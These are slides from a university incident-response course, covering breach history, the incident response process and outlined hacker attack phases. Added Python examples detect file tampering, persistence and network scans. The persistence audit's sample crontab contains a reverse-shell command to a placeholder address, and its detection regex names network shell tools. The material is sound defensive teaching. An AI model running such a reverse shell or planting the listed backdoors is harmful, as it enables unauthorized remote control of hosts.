Slide 1
Lesson 1: IS-6353 Course Introduction
Slide 2 (UTSA IS 6353 Incident Response)
Overview
Course Administrivia
Info Assurance Review
Incident Response
Slide 3
IS 6353 Intrusion Detection and Incident Response
6:00-7:50 PM, T/TH
Robert Kaufman
Background
Contact information
Syllabus and Class Schedule
Student Background Information
Email to robert.kaufman@utsa.edu
Slide 4
Student Information
Send an email to me with:
Name
Reliable email address
Email to: robkaufmaniii@sbcglobal.net
Slide 5
Text Books
Course Text: Incident Response and Computer Forensics, McGraw-Hill, 2014, ISBN 978-0071798686
Additional References:
Principles of Computer Security, by Conklin, White, Cothren, Williams, and Davis
Hacking Exposed, by McClure, Scambray, and Kurtz
Cybercrime Investigator's Field Guide, by Bruce Middleton
Slide 6
Grading
2 Tests
Final (maybe)
1 Paper
5 Labs
Slide 7
(figure only, no recoverable text)
Slide 8
Mandiant APT1 report: industries compromised, 2006-2012 (chart; x-axis is the year)
Industries shown: Information Technology; Transportation; High Tech Electronics; Financial Services; Navigation; Legal Services; Engineering Services; Media, Advertising & Entertainment; Food and Agriculture; Satellites & Telecommunications; Chemicals; Energy; International Organizations; Scientific Research and Consulting; Public Administration; Construction & Manufacturing; Aerospace; Education; Metals and Mining; Healthcare
Slide 9
Notable SQL Injection Breaches (chart covering 2007-2013)
Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
Organization: records exposed (or dollar loss where the chart gives one)
Heartland: 130,000,000
LivingSocial: 50,000,000
Global Payments: $92,000,000
Gamigo: 11,000,000
Ingenicard: $9,000,000
Sony PlayStation: 7,000,000
LinkedIn: 6,500,000
Sony Pictures: 1,000,000
Dexia Bank: 1,700,000
FBI/NASA: 1,600,000
Hannaford: 4,200,000
VISA (Jordan): 800,000
Diners Club: 500,000
Yahoo: 450,000
Adobe: 150,000
Domino's Pizza: 37,000
Fed Gov't: 100,000
Target (?): 70,000,000
Federal Reserve: 4,000
TJX: 47,000,000
Loss figures annotated on the chart: $254M loss, $455M loss
Slide 10
Notable Recent Activity
Sony hack
Anthem (medical data)
$1B worldwide bank heist
Target
Heartland Payment Systems and the TJ Maxx (TJX) credit card thefts
Internet traffic rerouted through Russia, China, and Belarus (BGP route hijacks)
VENOM ("virtualized environment neglected operations manipulation"), the QEMU virtual floppy controller bug that lets a guest break out of its VM; reported as shattering the myth of cloud security
WannaCry ransomware
Slide 11
A Sampling of Malicious Activity
March 1999 - eBay gets hacked
March 1999 - Melissa virus hits the Internet
April 1999 - Chernobyl (CIH) virus hits
May 1999 - Hackers shut down web sites of the FBI, Senate, and DOE
June 1999 - Worm.ExploreZip hits
July 1999 - Cult of the Dead Cow (cDc) releases Back Orifice 2000
Sept 1999 - Hacker pleads guilty to attacking NATO and Gore web sites
Oct 1999 - Teenage hacker admits to breaking into AOL
Slide 12
A Sampling of Malicious Activity
Nov 1999 - BubbleBoy virus hits
Dec 1999 - Babylonia virus spreads
Feb 2000 - Several sites experience DoS attacks
Feb 2000 - Alaska Airlines site hacked
May 2000 - Love Bug virus ravages the net
July 2001 - Code Red runs rampant
Sept 2001 - Nimda explodes
Slide 13
A Sampling of Malicious Activity
Jan 2003 - Sapphire/Slammer worm
Aug 2003 - Blaster (LoveSan) worm
Jan 2004 - MyDoom
Mar 2004 - Witty worm
May 2004 - Sasser worm
Dec 2006 - TJX credit/debit card theft
Jan 2007 - Storm worm
Mar 2009 - Conficker
June 2010 - Stuxnet
Ref: http://en.wikipedia.org/wiki/Timeline_of_notable_computer_viruses_and_worms
Slide 14
Spread of Slammer, 25 Jan 2003 05:29 UTC (map)
Source: https://www.caida.org/publications/papers/2003/sapphire/sapphire.html
Slide 15
Spread of Slammer, 25 Jan 2003 06:00 UTC (map)
Slide 16
CSI Survey: Average Loss (chart)
Ref: 2008 CSI Survey
Slide 17
Current Landscape: Q1 2018 by the Numbers
Exploits
6,623 unique detections (+11%)
238 detections per firm (-13%)
73% saw severe exploits (+1%)
<1% recorded ICS-related exploits
Malware
15,071 unique variants (-15%)
3,078 different families (-2%)
3 variants spread to ≥1/10 firms (-67%)
28% saw cryptojacking malware (+15%)
Botnets
1.8 active botnets per firm (0%)
2.8% saw ≥10 botnets (-1%)
58% of botnet infections last 1 day
5% of botnet infections last >1 week
Ref: Fortinet Q1 CY18 Trend Report
Slide 18
Early DISA Vulnerability Assessment Program Results (funnel diagram)
38,000 attacks
Protection: 13,300 blocked; 24,700 succeeded
Detection: of the 24,700 that succeeded, 988 detected; 23,712 undetected
Reaction: of the 988 detected, 267 reported; 721 not reported
Net effect: only 267 of 38,000 attacks (about 0.7%) were both detected and reported.
Slide 19
Computer Security
The prevention and/or detection of unauthorized actions by users of a computer system.
In the beginning, this meant ensuring privacy on shared systems.
Today, the interesting aspect of security is enabling different levels of access for different users and programs.
Slide 20
What are our goals in Security?
The "CIA" of security
Confidentiality
Integrity: data integrity and software integrity
Availability: accessible and usable on demand
Supporting services: authentication, non-repudiation
Slide 21
The "root" of the problem
Most security problems can be grouped into one of the following categories:
Network and host misconfigurations
Operating system and application flaws
Deficiencies in vendor quality assurance efforts
Lack of qualified people in the field
Lack of understanding of, or concern for, security
Slide 22
Computer Security Operational Model
Protection = Prevention + (Detection + Response)
Prevention: access controls, encryption, firewalls
Detection: intrusion detection
Response: incident handling
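The detection term of the operational model applied to software integrity (the "Integrity" goal of slide 20): a baseline of file hashes lets you notice a trojanized binary or a dropped tool that prevention missed. This is an added example, not material from the slides or the course text; the files it hashes are created in a temporary directory for the demonstration, and the "trojanized ps" is constructed.

```python
"""File-integrity baseline check: record SHA-256 of every file under a root,
then diff a later snapshot against it. Added example, not from the slides.
The files under the temporary directory are constructed for the demo."""
import hashlib
import tempfile
from pathlib import Path


def hash_file(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large binaries do not load whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {str(p.relative_to(root)): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(old, new):
    """Classify differences between two baselines."""
    return {
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
    }


def demo():
    """Constructed scenario: take a baseline, then simulate an intruder who
    trojanizes 'ps' to hide a process and drops a hidden tool."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\n/usr/bin/ls \"$@\"\n")
        (root / "bin" / "ps").write_bytes(b"#!/bin/sh\n/usr/bin/ps \"$@\"\n")
        before = baseline(root)
        (root / "bin" / "ps").write_bytes(
            b"#!/bin/sh\n/usr/bin/ps \"$@\" | grep -v sshd2\n")
        (root / "bin" / ".t").write_bytes(b"constructed tool payload")
        after = baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline must be stored off-host (or signed) so an intruder who gains root cannot rewrite it along with the binaries; the comparison is only as trustworthy as the copy of `before` you kept.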
Slide 23
Proactive vs. Reactive Models
"Most organizations only react to security threats, and, oftentimes, those reactions come after the damage has already been done."
"The key to a successful information security program resides in taking a pro-active stance towards security threats, and attempting to eliminate vulnerability points before they can be used against you."
Slide 24
So What Happens When Computer Security Fails?
Incident Response Methodology: 7-Step Process
Preparation: proactive computer security
Detection of Incidents
Initial Response
Formulate Response Strategy
Investigate the Incident
Reporting
Resolution
Slide 25
7 Components of Incident Response (figure)
Pre-Incident Preparation
Detection of Incidents
Initial Response
Formulate Response Strategy
Investigate the Incident: Data Collection, Data Analysis
Reporting
Resolution: Recovery, Implement Security Measures
Page 15, Fig 2-1, Mandia 2nd Edition
Slide 26
Resources in the Fight
SANS
CERT/CC
FIRST
CERIAS
NIST
CIAS
Slide 27
SANS
SysAdmin, Audit, Network, and Security (SANS) Institute
Global Incident Analysis Center
Security alerts, updates, and education
NewsBites, Security Digest, Windows Digest
Certification
http://www.sans.org/
Slide 28
Carnegie Mellon CERT/CC
Computer Emergency Response Team Coordination Center
Started by DARPA
Alerts and response services
Training and CERT stand-up
Clearing house
http://www.cert.org
Slide 29
FIRST
Forum of Incident Response and Security Teams
Established 1990
Government and private-sector membership
Over 70 members (at the time of this slide)
Coordinates global response
http://www.first.org
Slide 30
CERIAS
Center for Education and Research in Information Assurance and Security
Home of Gene Spafford
A "University Center"
InfoSec research and education
Members: academia, government, and industry
http://www.cerias.purdue.edu/coast/
Slide 31
NIST
National Institute of Standards and Technology (NIST)
Operates the Computer Security Resource Center (CSRC)
Raising awareness
Multiple disciplines
Main source of federal government standards
http://csrc.ncsl.nist.gov/
Slide 32
CIAS
UTSA's Center for Infrastructure Assurance and Security (CIAS)
Multidisciplinary education and development of operational capabilities in the areas of infrastructure assurance and security.
National cyber exercises
Cyber security training
Cyber competitions
http://www.utsa.edu/cias/
Slide 33
Let's see what the CERT at CMU says: http://www.cert.org/
US-CERT: https://www.us-cert.gov/
How many vulnerabilities are out there?
Slide 34
History Lesson
The Art of War, Sun Tzu
Lesson for you
Know the enemy
Know yourself, and in a hundred battles you will never be defeated
If ignorant both of your enemy and of yourself, you are certain in every battle to be in peril
Slide 35
History Lesson
The Art of War, Sun Tzu
Lesson for the hacker
Probe him and learn where his strength is abundant and where deficient
To subdue the enemy without fighting is the acme of skill
One able to gain victory by modifying his tactics in accordance with the enemy situation may be said to be divine
Slide 36
Hacker Attacks
The intent is for you to know your enemy
Not intended to make you a hacker
Need to know defensive techniques
Need to know where to start the recovery process
Need to assess the extent of the investigative environment
Slide 37
Anatomy of a Hack (the phases, in order)
Footprinting
Scanning
Enumeration
Gaining Access
Escalating Privilege
Pilfering
Covering Tracks
Creating Backdoors
Denial of Service
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 38
Footprinting
Objective
Determine the target address range
Acquire the namespace (domains, hosts)
Information gathering for a surgical attack
Don't miss details
Technique
Open source search
whois (command line, web interfaces, ARIN whois)
DNS zone transfer
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 39
Scanning
Objective
Bulk target assessment
Determine listening services
Focus the attack vector
Technique
Ping sweep
TCP/UDP port scan
OS detection
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 40
Enumeration
Objective
Intrusive probing commences
Identify valid accounts
Identify poorly protected shares
Technique
List user accounts
List file shares
Identify applications
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 41
Gaining Access
Objective
Informed attempt to access the target
Typically user-level access
Technique
Password sniffing
File share brute forcing
Password file grab
Buffer overflows
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 42
Escalating Privilege
Objective
Gain root-level access
Technique
Password cracking
Known exploits
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 43
Pilfering
Objective
Information gathering to reach trusted systems
Technique
Evaluate trusts
Search for cleartext passwords
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 44
Covering Tracks
Objective
Ensure the highest level of access is retained
Hide access from the system administrator or owner
Technique
Clear logs
Hide tools
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Slide 45
Creating Back Doors
Objective
Deploy trap doors
Ensure easy return access
Technique
Create rogue user accounts
Schedule batch jobs
Infect startup files
Plant remote control services
Install monitors
Trojanize binaries
Source: Hacking Exposed, McClure, Scambray, and Kurtz
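From the responder's side, the three host-level techniques on this slide (rogue accounts, scheduled jobs, infected startup files) leave artefacts you can audit. The following is an added example, not material from the slides or from Hacking Exposed: it checks Unix-style passwd, crontab and rc.local contents that are constructed for the demonstration, and the list of suspicious command patterns is an assumption chosen for illustration, not an exhaustive signature set.

```python
"""Audit Unix host artefacts for the persistence techniques on the slide:
a second UID-0 account, a cron job that opens a reverse shell, and a startup
script launching a tool from /tmp. Added example; the passwd, crontab and
rc.local texts below are constructed. A real audit reads /etc/passwd,
/etc/crontab, /etc/cron.d/*, per-user crontabs and the startup scripts."""
import re

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
"""

SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *  * * * root     cd / && run-parts --report /etc/cron.hourly
*/5 * * * * www-data /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.9/4444 0>&1'
@reboot     root     /usr/sbin/ntpdate pool.ntp.org
"""

SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
nohup /tmp/.x/sshd -p 2222 &
exit 0
"""

# Assumed, illustrative patterns: reverse shells and tools staged in
# world-writable directories. Tune to the environment before relying on it.
SUSPICIOUS = re.compile(
    r"/dev/tcp/|\bnc\b|\bncat\b|\bsocat\b|bash -i|/tmp/|/dev/shm/|base64 -d")


def rogue_uid0_accounts(passwd_text, expected=("root",)):
    """UID-0 logins other than the expected ones (an attacker's 'second root')."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and fields[0] not in expected:
            rogue.append(fields[0])
    return rogue


def suspicious_entries(text):
    """Non-comment lines whose command matches SUSPICIOUS. Works for a system
    crontab (user field included) and for startup scripts such as rc.local."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and SUSPICIOUS.search(s):
            hits.append(s)
    return hits


def audit(passwd=SAMPLE_PASSWD, crontab=SAMPLE_CRONTAB, rc_local=SAMPLE_RC_LOCAL):
    """Run all three checks and return the findings by category."""
    return {
        "rogue_uid0": rogue_uid0_accounts(passwd),
        "cron": suspicious_entries(crontab),
        "startup": suspicious_entries(rc_local),
    }


if __name__ == "__main__":
    for category, findings in audit().items():
        print(f"{category}: {findings}")
```

Pattern matching like this catches the obvious cases an intruder leaves behind in a hurry; the durable control is a baseline (known accounts, known cron entries, known startup scripts) diffed on a schedule, since a careful attacker will name a job something boring.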
Slide 46
Denial of Service
Objective
If unable to escalate privilege, then deny service ("kill" the target)
Build a DDoS network
Technique
SYN flood
ICMP attacks
Identical source/destination SYN requests (the Land attack)
Out-of-bounds TCP options
DDoS
Source: Hacking Exposed, McClure, Scambray, and Kurtz
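The scanning and denial-of-service phases above each have a recognisable network signature, and an incident responder usually meets them first in firewall or sensor logs. The following added example (not from the slides or from Hacking Exposed) flags ping sweeps and port scans (slide 39) and Land packets and SYN floods (slide 46) in a simple connection log. The log format, the thresholds, and all of the traffic are constructed for the example; a real deployment would read from a sensor and tune the thresholds to the network's normal traffic.

```python
"""Detect the network signatures of the scanning and DoS phases in a
connection log. Added example, not from the slides. The log format and all
traffic are constructed; one record per line:
    <epoch> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <flags>
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<proto>icmp|tcp|udp) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<flags>[A-Z-]+)$"
)


def parse(lines):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            for k in ("ts", "sport", "dport"):
                e[k] = int(e[k])
            events.append(e)
    return events


def ping_sweeps(events, min_hosts=8):
    """Sources that sent ICMP echo requests to at least min_hosts distinct hosts."""
    hosts = defaultdict(set)
    for e in events:
        if e["proto"] == "icmp" and e["flags"] == "ECHO":
            hosts[e["src"]].add(e["dst"])
    return {src: len(h) for src, h in hosts.items() if len(h) >= min_hosts}


def port_scans(events, min_ports=10):
    """(src, dst) pairs where src probed at least min_ports distinct ports on dst."""
    ports = defaultdict(set)
    for e in events:
        if (e["proto"] == "tcp" and e["flags"] == "S") or e["proto"] == "udp":
            ports[(e["src"], e["dst"])].add(e["dport"])
    return {pair: len(p) for pair, p in ports.items() if len(p) >= min_ports}


def land_packets(events):
    """SYNs whose source address:port equals the destination (the Land attack).
    Such a packet never occurs legitimately; it is always forged."""
    return [e for e in events
            if e["proto"] == "tcp" and e["flags"] == "S"
            and e["src"] == e["dst"] and e["sport"] == e["dport"]]


def syn_floods(events, window=10, min_syn=50, ack_ratio=0.1):
    """(dst, dport, window_start) buckets with at least min_syn SYNs and
    fewer than ack_ratio * SYNs client ACKs. Sources are ignored on purpose:
    a flood is normally sent from spoofed addresses."""
    syn = defaultdict(int)
    ack = defaultdict(int)
    for e in events:
        if e["proto"] != "tcp":
            continue
        key = (e["dst"], e["dport"], (e["ts"] // window) * window)
        if e["flags"] == "S":
            syn[key] += 1
        elif "A" in e["flags"]:
            ack[key] += 1
    return {k: n for k, n in syn.items() if n >= min_syn and ack[k] < n * ack_ratio}


def build_sample_log():
    """Constructed traffic: one benign handshake, then the attack phases."""
    lines = ["1000 tcp 10.0.0.5:40001 -> 10.0.0.80:443 S",
             "1000 tcp 10.0.0.80:443 -> 10.0.0.5:40001 SA",
             "1001 tcp 10.0.0.5:40001 -> 10.0.0.80:443 A"]
    # scanning: ping sweep of 10.0.0.0/24, then a port scan of the web server
    lines += [f"1100 icmp 198.51.100.7:0 -> 10.0.0.{i}:0 ECHO" for i in range(1, 21)]
    lines += [f"1200 tcp 198.51.100.7:50000 -> 10.0.0.80:{p} S"
              for p in (21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445)]
    # denial of service: one Land packet, then a spoofed SYN flood on port 80
    lines += ["1300 tcp 10.0.0.80:80 -> 10.0.0.80:80 S"]
    lines += [f"{1400 + i // 30} tcp 203.0.113.{i % 250 + 1}:{1024 + i} -> 10.0.0.80:80 S"
              for i in range(120)]
    return lines


def analyze(lines):
    """Run every detector over the log and return the findings."""
    events = parse(lines)
    return {"ping_sweeps": ping_sweeps(events),
            "port_scans": port_scans(events),
            "land_packets": len(land_packets(events)),
            "syn_floods": syn_floods(events)}


if __name__ == "__main__":
    for name, finding in analyze(build_sample_log()).items():
        print(f"{name}: {finding}")
```

The thresholds are the part that needs care: a monitoring host that pings every server will look like a sweep, and a busy web server in a 10-second window may legitimately see more SYNs than `min_syn`, which is why the flood check also requires that almost none of the handshakes complete.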
Slide 47
Hacking Summary
Threat: hacking on the rise
Security posture usually reactive
Losses increasing
7-Step Process
Hacker techniques